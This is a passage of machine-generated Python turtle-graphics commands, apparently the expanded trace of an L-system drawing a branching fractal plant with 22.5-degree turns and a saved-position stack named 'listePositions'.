pd(), fd(8.0) ;
pu(), setposition((115.02,141.00)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((88.93,123.57), 45.0), ((121.15,155.78), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((121.15,155.78)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((88.93,123.57), 45.0), ((121.15,155.78), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((121.15,155.78)), setheading(67.5) ;
pu(), setposition((88.93,123.57)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((88.93,123.57), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((88.93,123.57), 67.5), ((88.93,139.57), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((88.93,139.57)), setheading(67.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((88.93,123.57), 67.5), ((88.93,139.57), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((88.93,139.57)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((88.93,123.57), 67.5), ((95.05,154.35), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((95.05,154.35)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((88.93,123.57), 67.5), ((95.05,154.35), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((95.05,154.35)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((88.93,123.57), 67.5), ((106.37,165.66), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((106.37,165.66)), setheading(22.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((88.93,123.57), 67.5), ((106.37,165.66), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((106.37,165.66)), setheading(45.0) ;
pu(), setposition((88.93,123.57)), setheading(67.5) ;
pu(), setposition((24.49,59.13)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,75.13), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((24.49,75.13)), setheading(67.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,75.13), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((24.49,75.13)), setheading(90.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,91.13), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((24.49,91.13)), setheading(67.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,91.13), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((24.49,91.13)), setheading(90.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,91.13), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,91.13), 67.5), ((35.81,102.44), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((35.81,102.44)), setheading(22.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,91.13), 67.5), ((35.81,102.44), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((35.81,102.44)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,91.13), 67.5), ((41.93,117.22), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((41.93,117.22)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,91.13), 67.5), ((41.93,117.22), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((41.93,117.22)), setheading(67.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,91.13), 67.5), ((41.93,133.22), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((41.93,133.22)), setheading(67.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,91.13), 67.5), ((41.93,133.22), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((41.93,133.22)), setheading(90.0) ;
pu(), setposition((24.49,91.13)), setheading(67.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,91.13), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,91.13), 90.0), ((18.37,105.91), 90.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((18.37,105.91)), setheading(90.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,91.13), 90.0), ((18.37,105.91), 112.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((18.37,105.91)), setheading(112.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,91.13), 90.0), ((18.37,121.91), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((18.37,121.91)), setheading(67.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,91.13), 90.0), ((18.37,121.91), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((18.37,121.91)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,91.13), 90.0), ((24.49,136.69), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((24.49,136.69)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,91.13), 90.0), ((24.49,136.69), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((24.49,136.69)), setheading(67.5) ;
pu(), setposition((24.49,91.13)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((30.61,105.91), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((30.61,105.91)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((30.61,105.91), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((30.61,105.91)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((36.74,120.69), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((36.74,120.69)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((36.74,120.69), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((36.74,120.69)), setheading(67.5) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((36.74,120.69), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((36.74,120.69), 45.0), ((51.52,126.82), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((51.52,126.82)), setheading(0.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((36.74,120.69), 45.0), ((51.52,126.82), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((51.52,126.82)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((36.74,120.69), 45.0), ((62.83,138.13), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((62.83,138.13)), setheading(22.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((36.74,120.69), 45.0), ((62.83,138.13), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((62.83,138.13)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((36.74,120.69), 45.0), ((68.96,152.91), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((68.96,152.91)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((36.74,120.69), 45.0), ((68.96,152.91), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((68.96,152.91)), setheading(67.5) ;
pu(), setposition((36.74,120.69)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((36.74,120.69), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((36.74,120.69), 67.5), ((36.74,136.69), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((36.74,136.69)), setheading(67.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((36.74,120.69), 67.5), ((36.74,136.69), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((36.74,136.69)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((36.74,120.69), 67.5), ((42.86,151.47), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,151.47)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((36.74,120.69), 67.5), ((42.86,151.47), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,151.47)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((36.74,120.69), 67.5), ((54.17,162.79), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((54.17,162.79)), setheading(22.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((36.74,120.69), 67.5), ((54.17,162.79), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((54.17,162.79)), setheading(45.0) ;
pu(), setposition((36.74,120.69)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((48.05,132.01), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.05,132.01)), setheading(22.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((48.05,132.01), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.05,132.01)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((59.37,143.32), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((59.37,143.32)), setheading(22.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((59.37,143.32), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((59.37,143.32)), setheading(45.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((59.37,143.32), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((59.37,143.32), 22.5), ((75.37,143.32), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((75.37,143.32)), setheading(337.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((59.37,143.32), 22.5), ((75.37,143.32), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((75.37,143.32)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((59.37,143.32), 22.5), ((90.15,149.44), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((90.15,149.44)), setheading(0.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((59.37,143.32), 22.5), ((90.15,149.44), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((90.15,149.44)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((59.37,143.32), 22.5), ((101.46,160.76), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((101.46,160.76)), setheading(22.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((59.37,143.32), 22.5), ((101.46,160.76), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((101.46,160.76)), setheading(45.0) ;
pu(), setposition((59.37,143.32)), setheading(22.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((59.37,143.32), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((59.37,143.32), 45.0), ((65.49,158.10), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((65.49,158.10)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((59.37,143.32), 45.0), ((65.49,158.10), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((65.49,158.10)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((59.37,143.32), 45.0), ((76.80,169.42), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((76.80,169.42)), setheading(22.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((59.37,143.32), 45.0), ((76.80,169.42), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((76.80,169.42)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((59.37,143.32), 45.0), ((91.58,175.54), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((91.58,175.54)), setheading(0.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((59.37,143.32), 45.0), ((91.58,175.54), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((91.58,175.54)), setheading(22.5) ;
pu(), setposition((59.37,143.32)), setheading(45.0) ;
pu(), setposition((24.49,59.13)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((30.61,73.91), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((30.61,73.91)), setheading(45.0) ;
left(22.5) ;
listePositions = [((30.61,73.91), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((30.61,73.91)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((36.74,88.69), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((36.74,88.69)), setheading(45.0) ;
left(22.5) ;
listePositions = [((36.74,88.69), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((36.74,88.69)), setheading(67.5) ;
right(22.5) ;
listePositions = [((36.74,88.69), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((36.74,88.69), 45.0), ((51.52,94.82), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((51.52,94.82)), setheading(0.0) ;
left(22.5) ;
listePositions = [((36.74,88.69), 45.0), ((51.52,94.82), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((51.52,94.82)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((36.74,88.69), 45.0), ((62.83,106.13), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((62.83,106.13)), setheading(22.5) ;
left(22.5) ;
listePositions = [((36.74,88.69), 45.0), ((62.83,106.13), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((62.83,106.13)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((36.74,88.69), 45.0), ((68.96,120.91), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((68.96,120.91)), setheading(45.0) ;
left(22.5) ;
listePositions = [((36.74,88.69), 45.0), ((68.96,120.91), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((68.96,120.91)), setheading(67.5) ;
pu(), setposition((36.74,88.69)), setheading(45.0) ;
left(22.5) ;
listePositions = [((36.74,88.69), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((36.74,88.69), 67.5), ((36.74,104.69), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((36.74,104.69)), setheading(67.5) ;
left(22.5) ;
listePositions = [((36.74,88.69), 67.5), ((36.74,104.69), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((36.74,104.69)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((36.74,88.69), 67.5), ((42.86,119.47), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,119.47)), setheading(45.0) ;
left(22.5) ;
listePositions = [((36.74,88.69), 67.5), ((42.86,119.47), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,119.47)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((36.74,88.69), 67.5), ((54.17,130.79), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((54.17,130.79)), setheading(22.5) ;
left(22.5) ;
listePositions = [((36.74,88.69), 67.5), ((54.17,130.79), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((54.17,130.79)), setheading(45.0) ;
pu(), setposition((36.74,88.69)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((42.86,103.47), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,103.47)), setheading(45.0) ;
left(22.5) ;
listePositions = [((42.86,103.47), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,103.47)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,118.26)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,118.26)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((63.77,124.38), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((63.77,124.38)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((63.77,124.38), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((63.77,124.38)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((75.08,135.69), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((75.08,135.69)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((75.08,135.69), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((75.08,135.69)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((81.20,150.48), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((81.20,150.48)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((81.20,150.48), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((81.20,150.48)), setheading(67.5) ;
pu(), setposition((48.98,118.26)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,134.26), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,134.26)), setheading(67.5) ;
left(22.5) ;
